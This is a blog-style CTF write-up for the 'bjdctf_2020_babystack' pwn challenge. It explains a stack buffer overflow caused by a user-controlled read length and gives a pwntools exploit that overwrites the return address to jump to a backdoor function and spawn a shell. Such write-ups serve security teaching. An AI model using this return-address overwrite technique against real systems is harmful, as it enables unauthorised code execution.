当前位置:网站首页>bjdctf_ 2020_ babystack
bjdctf_ 2020_ babystack
2022-06-24 07:23:00 【[mzq]】
bjdctf_2020_babystack
checksec once 64 Bit program Didn't open anything ,ida Look at the program 
main function
What do you think read Function reads in 0 A string , Read a lonely ,scanf Also can not overflow , There seems to be no problem 
however scanf Will read in a number entered by the user and assign it to nbytes , then read Will read nbytes Size characters , That is, we can overflow any length 
backdoor function
Run this function to get shell
exp
ret To balance the stack Actually backdoor Function recurs +1 It's OK
from pwn import *
io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561
print backdoor
io.sendlineafter(b"Please input the length of your name:","100")
payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])
io.sendlineafter("What's u name?",payload)
io.interactive()
边栏推荐
- 游戏思考14:对cache_server缓冲服务器的问题思考(读云峰博客有感)
- 自动化测试是什么?什么软件项目适合自动化测试?
- Software performance test analysis and tuning practice path - JMeter's performance pressure test analysis and tuning of RPC Services - manuscript excerpts
- [security] how to [host security - hybrid cloud version] support secure access to non Tencent virtual machines
- JVM debugging tool -arthas
- Serviceworker working mechanism and life cycle: resource caching and collaborative communication processing
- (CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
- Stop looking! The most complete data analysis strategy of the whole network is here
- Learning to use BACnet gateway of building control system is not so difficult
- Coding helps promote the internationalization of Tencent games
猜你喜欢
Huawei cloud database advanced learning
【图像融合】基于像素显着性结合小波变换实现多焦点和多光谱图像融合附matlab代码
![[image segmentation] retinal vessel segmentation based on morphology with matlab code](/img/e3/0805df81a597346ea7c2d2da20ac96.png)
[image segmentation] retinal vessel segmentation based on morphology with matlab code
JVM debugging tool -arthas
华为云数据库进阶学习
如何删除/选择电脑上的输入法
Functions in setinterval cannot have parentheses
现货黄金有哪些值得借鉴的心态
In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute
![[Proteus] Arduino uno + ds1307+lcd1602 time display](/img/96/d8c1cacc8a633c679b1a58a1eb8cb9.png)
[Proteus] Arduino uno + ds1307+lcd1602 time display
随机推荐
毕业季进击的技术
Serviceworker working mechanism and life cycle: resource caching and collaborative communication processing
伦敦金的资金管理比其他都重要
【Cnpm】使用教程
[cloud based co creation] overview of the IOT of Huawei cloud HCIA IOT v2.5 training series
2、 What is the principle of layer 3 and 4 switching technology? Recommended collection!
What is the mentality of spot gold worth learning from
蓝牙耳机怎么连接电脑使用,win10电脑如何连接蓝牙耳机
JVM调试工具-Arthas
软件性能测试分析与调优实践之路-JMeter对RPC服务的性能压测分析与调优-手稿节选
[WUSTCTF2020]爬
OMX initialization process
【图像融合】基于伪 Wigner 分布 (PWD) 实现图像融合附matlab代码
App management platform app host
0 foundation a literature club low code development member management applet (I)
Muxvlan principle, Huawei MUX VLAN experimental configuration
buuctf misc 从娃娃抓起
Introduction to raspberry pie 4B development board
Outils de débogage JVM - Arthas
Learning to use BACnet gateway of building control system is not so difficult